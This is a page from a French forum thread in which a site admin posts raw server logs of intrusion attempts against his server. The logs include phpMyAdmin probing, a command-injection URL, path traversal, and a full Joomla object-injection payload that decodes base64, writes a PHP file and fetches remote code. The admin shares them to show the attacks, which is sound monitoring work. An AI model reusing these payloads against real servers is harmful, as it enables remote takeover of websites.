Page 2 sur 5

Re: Sécurité

Publié : 18 mars 2016, 14:14
par Montparnasse
Oh, c'est courant. J'en avais déjà quand j'hébergeais mon site il y a dix ans. Là, c'est plutôt une attaque par dictionnaire. Ce qui est sûr c'est qu'ils n'ont pas utilisé le mien vu l'indigence des mots de passe essayés... :0

Re: Sécurité

Publié : 18 mars 2016, 19:56
par Dona
Bon... J'ai essayé de m'inscrire avec une nouvelle adresse pour tester "la bouillabaisse"... Je n'ai pas réussi à passer le test... Et ce, 3 fois de suite ! :rouge:

Re: Sécurité

Publié : 18 mars 2016, 22:08
par Montparnasse
Tu as fait la bouillabaisse à l'envers ! Je sais, c'est trompeur, je vais essayer d'inverser le captcha.

Re: Sécurité

Publié : 18 mars 2016, 22:18
par Montparnasse
Voilà, j'ai inversé les colonnes : à droite, à conserver pour la recette ; à gauche, ce qu'on doit laisser.

Je précise que l'araignée n'est pas une araignée de mer (de toute façon, elle ne fait pas partie de la recette).

Et la bouillabaisse, c'est ça : https://fr.wikipedia.org/wiki/Bouillabaisse

Re: Sécurité

Publié : 20 mars 2016, 18:23
par Montparnasse
La tentative du jour n'a duré que 4 minutes mais c'est bavard...

Image

Re: Sécurité

Publié : 22 mars 2016, 12:02
par Montparnasse
Hier, pour la première fois, aucune tentative d'intrusion sur le serveur. A suivre... ;)

Re: Sécurité

Publié : 22 mars 2016, 21:40
par Montparnasse
Une petite à 19H30 mais vraiment petite... :) Et puis, il trouve mais ne teste pas (en rouge)... bizarre.

Code : Tout sélectionner

103.255.15.69 - - [22/Mar/2016:19:30:03 +0100] "HEAD http://88.182.45.52:80/1phpmyadmin/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:03 +0100] "HEAD http://88.182.45.52:80/2phpmyadmin/ HTTP/1.1" 404 195 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:04 +0100] "HEAD http://88.182.45.52:80/3phpmyadmin/ HTTP/1.1" 404 195 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:04 +0100] "HEAD http://88.182.45.52:80/4phpmyadmin/ HTTP/1.1" 404 195 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:09 +0100] "HEAD http://88.182.45.52:80/admin/phpmyadmin/ HTTP/1.1" 404 195 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:12 +0100] "HEAD http://88.182.45.52:80/administrator/phpmyadmin/ HTTP/1.1" 404 195 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:17 +0100] "HEAD http://88.182.45.52:80/db/phpmyadmin/ HTTP/1.1" 404 195 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:17 +0100] "HEAD http://88.182.45.52:80/db/phpmyadmin3/ HTTP/1.1" 404 195 "-" "Mozilla/5.0 Jorgee"
[color=#FF0000]103.255.15.69 - - [22/Mar/2016:19:30:31 +0100] "HEAD http://88.182.45.52:80/phpmyadmin/ HTTP/1.1" 200 1454 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:31 +0100] "GET http://88.182.45.52:80/phpmyadmin/ HTTP/1.0" 200 10542 "-" "Mozilla/5.0 Jorgee"[/color]
103.255.15.69 - - [22/Mar/2016:19:30:32 +0100] "HEAD http://88.182.45.52:80/phpmyadmin1/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:32 +0100] "HEAD http://88.182.45.52:80/phpmyadmin2/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:33 +0100] "HEAD http://88.182.45.52:80/phpmyadmin3/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:34 +0100] "HEAD http://88.182.45.52:80/phpmyadmin4/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:48 +0100] "HEAD http://88.182.45.52:80/sql/phpmyadmin2/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:49 +0100] "HEAD http://88.182.45.52:80/sql/phpmyadmin3/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 Jorgee"
103.255.15.69 - - [22/Mar/2016:19:30:50 +0100] "HEAD http://88.182.45.52:80/sql/phpmyadmin4/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 Jorgee"

Re: Sécurité

Publié : 08 mai 2016, 10:49
par Montparnasse
Hier, vers 13H, plusieurs tentatives de hacking, ce qui devient rare, heureusement :

Code : Tout sélectionner

217.56.9.74 - - [07/May/2016:13:23:11 +0200] "\x16\x03\x01" 400 0 "-" "-"
217.56.9.74 - - [07/May/2016:13:23:21 +0200] "GET / HTTP/1.0" 200 2513 "-" "-"
217.56.9.74 - - [07/May/2016:13:23:31 +0200] "GET / HTTP/1.1" 200 1253 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"
217.56.9.74 - - [07/May/2016:13:23:41 +0200] "GET /CHANGELOG.txt HTTP/1.1" 404 470 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari$
217.56.9.74 - - [07/May/2016:13:23:52 +0200] "GET / HTTP/1.1" 200 1253 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36"
217.56.9.74 - - [07/May/2016:13:24:02 +0200] "GET /readme.html HTTP/1.1" 404 468 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.3$
217.56.9.74 - - [07/May/2016:13:24:11 +0200] "GET / HTTP/1.1" 200 1253 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36"
217.56.9.74 - - [07/May/2016:13:24:21 +0200] "GET /language/Swedish$%7BIFS%7D&&echo$%7BIFS%7DTWkA%3EStMf&&tar$%7BIFS%7D/string.js HTTP/1.1" 404 540 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; $
217.56.9.74 - - [07/May/2016:13:24:31 +0200] "GET /../../../../../../../mnt/mtd/StMf HTTP/1.1" 400 487 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0"
217.56.9.74 - - [07/May/2016:13:24:42 +0200] "GET / HTTP/1.1" 200 1253 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36"
111.248.115.186 - - [07/May/2016:13:27:35 +0200] "CONNECT vip163mx01.mxmail.netease.com:25 HTTP/1.0" 405 549 "-" "-"

Re: Sécurité

Publié : 19 mai 2016, 16:14
par Montparnasse
Regardez ce qu'on me dit, aujourd'hui, sur le serveur. Les gens sont vraiment mal polis ! :]

Code : Tout sélectionner

31.220.107.199 - - [19/May/2016:14:07:26 +0200] "GET / HTTP/1.1" 200 1234 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:1182:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2xvbGEucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21WamFHOGdJbTFoWjI1dmJTQmhkWFJ2SUdOeVpXRjBJR1pwYkdWeklqc05DZzBLWm5WdVkzUnBiMjRnYUhSMGNGOW5aWFFvSkhWeWJDbDdEUW9KSkdsdElEMGdZM1Z5YkY5cGJtbDBLQ1IxY213cE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOVNSVlJWVWs1VVVrRk9VMFpGVWl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYME5QVGs1RlExUlVTVTFGVDFWVUxDQXhNQ2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBaUFRFeFBWMHhQUTBGVVNVOU9MQ0F4S1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlNFVkJSRVZTTENBd0tUc05DZ2x5WlhSMWNtNGdZM1Z5YkY5bGVHVmpLQ1JwYlNrN0RRb0pZM1Z5YkY5amJHOXpaU2drYVcwcE93MEtmUTBLSkdOb1pXTnJOVDBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmJHVm5ZV041TDJ4dlp5OXFjeTV3YUhBaUlEc05DaVIwWlhoME5TQTlJR2gwZEhCZloyVjBLQ2RvZEhSd2N6b3ZMMmRvYjNOMFltbHVMbU52YlM5d1lYTjBaUzloZHpWallTOXlZWGNuS1RzTkNpUnZjRFU5Wm05d1pXNG9KR05vWldOck5Td2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTFMQ1IwWlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRcEFkVzVzYVc1cktGOWZSa2xNUlY5ZktUc05DajgrJykpOw0KZmNsb3NlKCRmcCk7'));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"
31.220.107.199 - - [19/May/2016:14:07:27 +0200] "GET / HTTP/1.1" 200 1234 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:1182:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2xvbGEucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21WamFHOGdJbTFoWjI1dmJTQmhkWFJ2SUdOeVpXRjBJR1pwYkdWeklqc05DZzBLWm5WdVkzUnBiMjRnYUhSMGNGOW5aWFFvSkhWeWJDbDdEUW9KSkdsdElEMGdZM1Z5YkY5cGJtbDBLQ1IxY213cE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOVNSVlJWVWs1VVVrRk9VMFpGVWl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYME5QVGs1RlExUlVTVTFGVDFWVUxDQXhNQ2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBaUFRFeFBWMHhQUTBGVVNVOU9MQ0F4S1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlNFVkJSRVZTTENBd0tUc05DZ2x5WlhSMWNtNGdZM1Z5YkY5bGVHVmpLQ1JwYlNrN0RRb0pZM1Z5YkY5amJHOXpaU2drYVcwcE93MEtmUTBLSkdOb1pXTnJOVDBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmJHVm5ZV041TDJ4dlp5OXFjeTV3YUhBaUlEc05DaVIwWlhoME5TQTlJR2gwZEhCZloyVjBLQ2RvZEhSd2N6b3ZMMmRvYjNOMFltbHVMbU52YlM5d1lYTjBaUzloZHpWallTOXlZWGNuS1RzTkNpUnZjRFU5Wm05d1pXNG9KR05vWldOck5Td2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTFMQ1IwWlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRcEFkVzVzYVc1cktGOWZSa2xNUlY5ZktUc05DajgrJykpOw0KZmNsb3NlKCRmcCk7'));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"
31.220.107.199 - - [19/May/2016:14:07:27 +0200] "GET /libraries/lola.php HTTP/1.1" 404 455 "-" "python-requests/0.8.2"
31.220.107.199 - - [19/May/2016:14:07:27 +0200] "GET /libraries/legacy/log/js.php HTTP/1.1" 404 464 "-" "python-requests/0.8.2"

Tests de sécurité de 9h30 à 11h

Publié : 03 juin 2016, 08:51
par Montparnasse
Le serveur sera scanné de 9h30 à 11h pour tester sa résistance à d'éventuelles attaques. Des ralentissements sont à prévoir. Merci de votre patience.